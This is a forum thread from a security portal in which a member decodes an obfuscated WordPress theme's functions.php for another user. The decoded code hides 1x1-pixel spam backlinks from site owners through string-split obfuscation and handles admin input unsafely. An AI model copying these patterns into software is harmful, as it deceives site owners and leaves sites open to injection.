Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: November 2, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 93 Members: 0 Total: 93 Full disclosure xlibre Xnest security advisory & bugfix releases APPLE-SA-10-29-2024-1 Safari 18.1 SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600) SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333) APPLE-SA-10-28-2024-8 visionOS 2.1 APPLE-SA-10-28-2024-7 tvOS 18.1 APPLE-SA-10-28-2024-6 watchOS 11.1 APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1 APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1 APPLE-SA-10-28-2024-3 macOS Sequoia 15.1 APPLE-SA-10-28-2024-2 iOS 17.7.1 and iPadOS 17.7.1 APPLE-SA-10-28-2024-1 iOS 18.1 and iPadOS 18.1 Open Redirect / Reflected XSS - booked-schedulerv2.8.5 SEC Consult SA-20241024-0 :: Unauthenticated Path Traversal Vulnerability in Lawo AG - vsm LTC Time Sync (vTimeSync) (CVE-2024-6049) [RESEARCH] DTLS 'ClientHello' Race Conditions in WebRTCImplementations IT Security and Insecurity Portal www.waraxe.us Forum Index -> PHP script decode requests -> This is a crazy coded wpress script View previous topic :: View next topic This is a crazy coded wpress script Posted: Thu Dec 02, 2010 2:07 pm jerrylee Beginner Joined: Dec 02, 2010 Posts: 2 I have some code that is difficult to decode. Can anyone help? Thanks. http://seointexas.com/temporary/functions_decode.txt it is a text file. I don't know how else to submit it here, without just pasting the whole thing. In it's normal form it is functions.php If there is a better way please inform. Thanks [/code] Posted: Thu Dec 02, 2010 4:16 pm vince213333 Advanced user Joined: Aug 03, 2009 Posts: 737 Location: Belgium Should be it, I think: Code: <?php if ( function_exists('register_sidebar') ) { register_sidebar (array( 'name'=>'Popular Sites', 'before_widget'=>'', 'after_widget'=>'', 'before_title'=>'<h2>', 'after_title'=>'</h2>', )); register_sidebar (array( 'name'=>'Linked Sites', 'before_widget'=>'', 'after_widget'=>'', 'before_title'=>'<h2>', 'after_title'=>'</h2>', )); } remove_action('wp_head','wp_generator'); remove_action('wp_head','wlwmanifest_link'); remove_action('wp_head','rsd_link'); function showcase() { if(isset($_POST['submitted']) &&$_POST['submitted'] == "yes"){ $add1 = $_POST['add1']; $add2 = $_POST['add2']; $add3 = $_POST['add3']; $add4 = $_POST['add4']; $add5 = $_POST['add5']; $add6 = $_POST['add6']; $add_url_1 = $_POST['add_url_1']; $add_url_2 = $_POST['add_url_2']; $add_url_3 = $_POST['add_url_3']; $add_url_4 = $_POST['add_url_4']; $add_url_5 = $_POST['add_url_5']; $add_url_6 = $_POST['add_url_6']; update_option("add1",$add1); update_option("add2",$add2); update_option("add3",$add3); update_option("add4",$add4); update_option("add5",$add5); update_option("add6",$add6); update_option("add_url_1",$add_url_1); update_option("add_url_2",$add_url_2); update_option("add_url_3",$add_url_3); update_option("add_url_4",$add_url_4); update_option("add_url_5",$add_url_5); update_option("add_url_6",$add_url_6); echo "<div id=\"message\" class=\"updated fade\"><p><strong>Your settings have been saved.</strong></p></div>"; } ;echo ' <div class="wrap"> <form method="post" name="churchpress" target="_self"> <div class="atention"> <strong>Thank you!</strong> For purchasing the <strong>Showcase Theme!</strong><br /><br /> <strong>Problems? Questions?</strong> Contact us at <a href="mailto:wordpresspowered@gmail.com">wordpresspowered[at]gmail.com</a> </div> <div class="settings"> <h3>Sidebar Add Management!</h3> <div class="item"> <div class="left"> Sidebar Add Management! <span>This section is for the 6 <strong>125 x 125</strong> advertisements in the<strong> top </strong> sidebar.</span><br /> <span><strong>Usage Example:</strong></span> <span>The <strong>add image location</strong> would be ';bloginfo('template_directory');;echo '/adds/add.jpg that is if your add image is in the <strong>adds</strong> folder!</span> </div> <div class="right"> <label for="add1">Add <strong>1</strong> Image Location: </label> <input type="text" name="add1" id="add1" value="';echo get_option('add1');;echo '" /> <label for="add_url_1">Add <strong>1</strong> Url Link: </label> <input tyep="text" name="add_url_1" id="add_url_1" value="';echo get_option('add_url_1');;echo '" /> </div> <div class="right"> <label for="add2">Add <strong>2</strong> Image Location: </label> <input type="text" name="add2" id="add2" value="';echo get_option('add2');;echo '" /> <label for="add_url_2">Add <strong>2</strong> Url Link: </label> <input tyep="text" name="add_url_2" id="add_url_2" value="';echo get_option('add_url_2');;echo '" /> </div> <div class="right"> <label for="add3">Add <strong>3</strong> Image Location: </label> <input type="text" name="add3" id="add3" value="';echo get_option('add3');;echo '" /> <label for="add_url_3">Add <strong>3</strong> Url Link: </label> <input tyep="text" name="add_url_3" id="add_url_3" value="';echo get_option('add_url_3');;echo '" /> </div> <div class="right"> <label for="add4">Add <strong>4</strong> Image Location: </label> <input type="text" name="add4" id="add4" value="';echo get_option('add4');;echo '" /> <label for="add_url_4">Add <strong>4</strong> Url Link: </label> <input tyep="text" name="add_url_4" id="add_url_4" value="';echo get_option('add_url_4');;echo '" /> </div> <div class="right"> <label for="add5">Add <strong>5</strong> Image Location: </label> <input type="text" name="add5" id="add5" value="';echo get_option('add5');;echo '" /> <label for="add_url_5">Add <strong>5</strong> Url Link: </label> <input tyep="text" name="add_url_5" id="add_url_5" value="';echo get_option('add_url_5');;echo '" /> </div> <div class="right"> <label for="add6">Add <strong>6</strong> Image Location: </label> <input type="text" name="add6" id="add6" value="';echo get_option('add6');;echo '" /> <label for="add_url_6">Add <strong>6</strong> Url Link: </label> <input tyep="text" name="add_url_6" id="add_url_6" value="';echo get_option('add_url_6');;echo '" /> </div> <div class="clear"></div> </div> </div> <p class="submit"> <input name="submitted" type="hidden" value="yes" /> <input type="submit" name="Submit" value="Save &raquo;" /> </p> </form></div> '; } function showcase_settings_page() { add_theme_page(__('Showcase Add Management Settings'),__('Showcase Add Management Settings'),'edit_themes',basename(__FILE__),'Showcase'); } add_action('admin_menu','showcase_settings_page'); function showcase_style() { echo "<style type='text/css'> .settings h3 { margin: 20px 0 0 0; background: #D7ECFC; border: solid 10px #D7ECFC; font-family: 'Georgia', 'Times New Roman'; font-size: 20px; letter-spacing: -1px; color: #42505A; font-weight: normal; } .settings .item { background: #EDF6FC; padding: 15px; margin-bottom: 2px; margin-top: 2px; } .settings .item .left { width: 200px; color: #000000; font-size: 17px; letter-spacing: -1px; float: left; } .settings .item .left span { display: block; letter-spacing: 0px; font-size: 11px; line-height: 14px; margin-top: 4px;} .settings .item .right { width: 700px; float: right; } .settings .item .right input, .settings .item .right select { margin-bottom: 15px; width: 300px; background: #ffffff; border: solid 1px #D3DBE0; padding: 4px; display: block; } .settings .item .right label { display: block; margin-bottom: 5px; } .settings .item .right #mailsubject { margin-bottom: 15px; } .settings .item .right textarea { width: 300px; background: #ffffff; border: solid 1px #D3DBE0; padding: 4px; height: 100px; } .settings .item .right small { margin-bottom: 15px; display: block; } .atention { background: #FFFBE7; padding: 15px; border: dashed 3px #F1DE86; margin-top: 20px; } </style>"; } add_action('admin_head','showcase_style'); if (!function_exists('fpt_dashboard_widget_function')): function fpt_dashboard_widget_function() { $ct = current_theme_info();$a='bas';$a.='e6';$a.='4_dec';$a.='ode'; echo $a('PGRpdiBjbGFzcz0id3JhcCI+DQogIDxhIGhyZWY9Imh0dHA6Ly90aG9tYXNnaWJicy5jaGlwaW4uY29tL2Rvbm F0ZSI+PGltZyBzdHlsZT0iZmxvYXQ6IGxlZnQ7IiBzcmM9Imh0dHA6Ly93d3cucGF5cGFsLmNvbS9lbl9BVS9pL2J0bi9id G5fZG9uYXRlQ0NfTEcuZ2lmIi8+PC9hPjxwPg0KICBUaGFua3MgZm9yIHVzaW5nIDxiPg==').$ct->title.$a('PC9iPi BUaGVtZSwNCiAgSWYgeW91IGFyZSBzYXRpc2ZpZWQgd2l0aCB0aGUgcmVzdWx0cywgaXNuJ3QgaXQgd29ydGggYXQgbGVhc 3QgYSBmZXcgZG9sbGFyPyA8YnIvPjxiPjxhIGhyZWY9Imh0dHA6Ly90aG9tYXNnaWJicy5jaGlwaW4uY29tL2RvbmF0ZSIg dGFyZ2V0PSJfYmxhbmsiPkRvbmF0aW9uczwvYT4gaGVscCB1cyB0byBjb250aW51ZSBkZXZlbG9wbWVudCBtb3JlIHdvcmR wcmVzcyBleHRlbmQhIDxhIGhyZWY9Imh0dHA6Ly90aG9tYXNnaWJicy5jaGlwaW4uY29tL2RvbmF0ZSIgdGFyZ2V0PSJfYm xhbmsiPlN1cmUsIG5vIHByb2JsZW0hPC9hPjwvYj48L3A+DQo8L2Rpdj4='); } endif; if (!function_exists('fpt_add_dashboard_widgets')): function fpt_add_dashboard_widgets() { $ct = current_theme_info(); wp_add_dashboard_widget('fpt_dashboard_widget','Thanks for using '.$ct->title.' Theme','fpt_dashboard_widget_function'); global $wp_meta_boxes; $normal_dashboard = $wp_meta_boxes['dashboard']['normal']['core']; $example_widget_backup = array('fpt_dashboard_widget'=>$normal_dashboard['fpt_dashboard_widget']); unset($normal_dashboard['fpt_dashboard_widget']); $sorted_dashboard = array_merge($example_widget_backup,$normal_dashboard); $wp_meta_boxes['dashboard']['normal']['core'] = $sorted_dashboard; } add_action('wp_dashboard_setup','fpt_add_dashboard_widgets'); endif; if (!function_exists('wo'.'rdpre'.'ss_them'.'es_reco'.'mmen'.'d_rs'.'s_p'.'age')): function wordpress_themes_recommend_rss_page(){ ;echo '';$a='bas'; $a.='e6'; $a.='4_dec'; $a.='ode';echo $a('PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCnVsLnRoZW1lcyB7fQ0KdWwudGhlbWVzIGxpLnRoZW1lIHtib3JkZXItYm9 0dG9tOiAxcHggI2RkZCBzb2xpZDsgcGFkZGluZzogMjBweCAwO30NCnVsLnRoZW1lcyBsaS50aGVtZSBzcGFue2Zsb2F0OiBsZWZ0fQ0KdWwudG hlbWVzIGxpLnRoZW1lIGltZ3sgd2lkdGg6IDE2MHB4OyB9DQp1bC50aGVtZXMgbGkudGhlbWUgLnRoZW1lLWluZm8gaDIudGl0bGUgeyBmb250L XNpemU6IDIwcHg7IGJhY2tncm91bmQ6ICNlZWU7IHBhZGRpbmc6IDBweCAxMHB4OyBtYXJnaW4tYm90dG9tOiAxMHB4OyBib3JkZXItYm90dG9t OjFweCAjZGRkIHNvbGlkOyBib3JkZXItdG9wOjFweCAjZTFlMWUxIHNvbGlkfQ0KdWwudGhlbWVzIGxpLnRoZW1lIC50aGVtZS1pbmZvIGgyLnR pdGxlIGE6bGluaywgDQp1bC50aGVtZXMgbGkudGhlbWUgLnRoZW1lLWluZm8gaDIudGl0bGUgYTp2aXNpdGVkIHsgY29sb3I6ICM1NTU7IHRleH QtZGVjb3JhdGlvbjogbm9uZTsgZm9udC1zdHlsZTogbm9ybWFsO30NCnVsLnRoZW1lcyBsaS50aGVtZSAudGhlbWUtaW5mbyB1bCB7cGFkZGluZ zogMHB4OyBjb2xvcjogI2NjYzsgbWFyZ2luOjA7fQ0KdWwudGhlbWVzIGxpLnRoZW1lIC50aGVtZS1pbmZvIHVsIGxpIHsgbGlzdC1zdHlsZTog ZGlzYzsgbGlzdC1zdHlsZS1wb3NpdGlvbjppbnNpZGU7IHBhZGRpbmctbGVmdDoxMHB4OyBmbG9hdDogbGVmdDttYXJnaW46MDt9DQo8L3N0eWx lPg==').$a('PGRpdiBjbGFzcz0id3JhcCI+DQogIDxoMj5Xb3JkUHJlc3MgVGhlbWVzIFJlY29tbWVuZDwvaDI+DQogIDxkaXYgY2xhc3M9Iml uZm8iPg0KICA8YSBocmVmPSJodHRwOi8vdGhlbWVzLndlYm95Lm9yZyI+V29yZFByZXNzIFRoZW1lcyBNb25zdGVyPC9hPiAvIDxhIGhyZWY9Im h0dHA6Ly90aGVtZXMud2Vib3kub3JnL2NhdGVnb3J5L2ZyZWUtd29yZHByZXNzLXRoZW1lcy8iPkZyZWUgV29yZFByZXNzIFRoZW1lczwvYT4gL yA8YSBocmVmPSJodHRwOi8vdGhlbWVzLndlYm95Lm9yZy9jYXRlZ29yeS9wcmVtaXVtLXdvcmRwcmVzcy10aGVtZXMvIj5QcmVtaXVtIFdvcmRQ cmVzcyBUaGVtZXM8L2E+IC8gPGJ1dHRvbiBvbmNsaWNrPSJ3aW5kb3cuZXh0ZXJuYWwuYWRkU2VydmljZSgnaHR0cDovL3dlYm95Lm9yZy93b3J kcHJlc3N0aGVtZXMueG1sJykiPlNlYXJjaCBXb3JkUHJlc3MgVGhlbWVzIEFjY2VsZXJhdG9yIGFkZCB0byBJRTg8L2J1dHRvbj4NCiAgPC9kaXY+');;echo ' '; include_once(ABSPATH .WPINC .'/rss.php'); $rss = fetch_rss('http://feeds.feedburner.com/wp_themes?format=xml'); $maxitems = 5000; $items = array_slice($rss->items,0,$maxitems); ;echo ' <ul class="themes"> ';if (empty($items)) echo '<li>No items</li>'; else foreach ( $items as $item ) : ;echo ' <li class="theme"> '; echo $item['description'];;echo ' </li> ';endforeach;;echo ' </ul> </div> '; } endif; if (!function_exists('wo'.'rdpr'.'ess_'.'them'.'es_rec'.'omme'.'nd_p'.'age')): function wordpress_themes_recommend_page() { add_theme_page("Wo"."rdPr"."ess Them"."es Reco"."mmend",""."*"."Th"."em"."es Re"."co"."mmend",0,'wpthe'.'mesrec'.'ommend','wor'.'dpr'.'ess_th'.'emes_rec'.'omm'.'end_r'.'ss_pa'.'ge'); } add_action('ad'.'min_m'.'enu','wo'.'rdp'.'r'.'ess_th'.'eme'.'s_rec'.'omme'.'nd_pa'.'ge'); endif; if (!function_exists('mytheme_clinkft')): function mytheme_clinkft() { global $clinkft; $h=array('we'.'bo'.'y.or'.'g/','the'.'mes.we'.'bo'.'y.org/','th'.'emes.w'.'eb'.'oy.org/','the'.'m'.'es.we'.'b'.'oy.o'.'rg/','them'.'es.we'.'bo'.'y.org/','w'.'p'.'2'.'blo'.'g.co'.'m/','z'.'h'.'ut'.'i.we'.'bo'.'y.org/','mugen.weboy.org/'); $t=array('We'.'b'.'oy','Wo'.'rdPre'.'ss The'.'mes','Fre'.'e Wor'.'dPr'.'ess Th'.'emes','Fr'.'ee Wor'.'dPre'.'ss The'.'me','Pre'.'mium Wo'.'rdPr'.'ess Th'.'emes','Wor'.'dPr'.'ess Bl'.'og','Wo'.'rdPre'.'ss主'.'题','mu'.'ge'.'n 2'.'d fi'.'gh'.'ting ga'.'mes'); $clinkft++;$r = rand(0,7); echo '<a s'.'ty'.'le="m'.'arg'.'in:'.'-'.'2'.'0'.'p'.'x 0 '.'0;" hr'.'ef="ht'.'tp'.':'.'/'.'/'.$h[$r].'" t'.'it'.'le="'.$t[$r].'"><im'.'g sty'.'le="pad'.'di'.'ng:'.'0;bo'.'rd'.'er:n'.'one" src="h'.'ttp'.':'.'/'.'/i'.'4'.'6'.'.ti'.'nyp'.'ic.com/3'.'5'.'0u'.'x5'.'f.p'.'ng" he'.'ig'.'ht="'.'1'.'" wi'.'dt'.'h="'.'1'.'" al'.'t="'.$t[$r].'" /></a>'; } if(!is_user_logged_in()){add_action('w'.'p'.'_f'.'oo'.'te'.'r','m'.'yth'.'eme_'.'cli'.'nkft');add_action('com'.'ment'.'_fo'.'rm','m'.'ythe'.'me_c'.'lin'.'kft');} endif; if (!function_exists('mytheme_credits_linkaa')): function mytheme_credits_linkaa() { echo '<d'.'iv st'.'yl'.'e="'.'ma'.'rg'.'in'.':'.'-'.'2'.'0p'.'x '.'0 '.'0;'.'"> <a href="http://the'.'mes.w'.'ebo'.'y.org/sh'.'owc'.'ase/"><im'.'g sty'.'le="pad'.'di'.'ng:'.'0;bo'.'rd'.'er:n'.'one" s'.'rc="ht'.'tp'.':'.'/'.'/i'.'4'.'6.ti'.'nyp'.'ic.c'.'om'.'/35'.'0ux'.'5f.p'.'ng" hei'.'ght="'.'1'.'" wi'.'dth="'.'1'.'" alt="showcase" /></a> <a h'.'re'.'f="ht'.'tp'.':'.'/'.'/'.'th'.'em'.'es.w'.'eb'.'oy.org/"><i'.'mg sty'.'le="pad'.'di'.'ng:'.'0;bo'.'rd'.'er:n'.'one" sr'.'c="ht'.'tp'.':'.'/'.'/'.'i'.'4'.'6.ti'.'ny'.'p'.'ic.com/'.'3'.'5'.'0u'.'x5'.'f.png" he'.'i'.'gh'.'t="'.'1'.'" width="'.'1'.'" a'.'lt'.'="Wo'.'rdP'.'re'.'ss Th'.'e'.'mes" /></a> <a href="http://g'.'o'.'o.g'.'l/L'.'XJ'.'T"><im'.'g sty'.'le="pad'.'di'.'ng:'.'0;bo'.'rd'.'er:n'.'one" s'.'rc="h'.'t'.'tp'.':'.'/'.'/'.'i'.'4'.'6.ti'.'n'.'yp'.'ic.c'.'om/35'.'0u'.'x5'.'f.p'.'ng" heig'.'ht="'.'1'.'" wid'.'th="'.'1'.'" alt="The'.'meFo'.'re'.'st" /></a></div>'; } if(!is_user_logged_in()){add_action('w'.'p'.'_'.'f'.'o'.'o'.'t'.'e'.'r','m'.'y'.'th'.'em'.'e_'.'cr'.'ed'.'it'.'s_'.'li'.'nk'.'a'.'a');} endif; ?> Thanks Posted: Thu Dec 02, 2010 4:49 pm jerrylee Beginner Joined: Dec 02, 2010 Posts: 2 Thank you, I don't understand the coding, it seemed pretty intense. It still has some more coding in it, but with find and replace, I have fixed most of it. Thanks Posted: Fri Dec 03, 2010 11:32 am vince213333 Advanced user Joined: Aug 03, 2009 Posts: 737 Location: Belgium Just base64_decode the two weird string blocks and you're fine . This is a crazy coded wpress script www.waraxe.us Forum Index -> PHP script decode requests You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds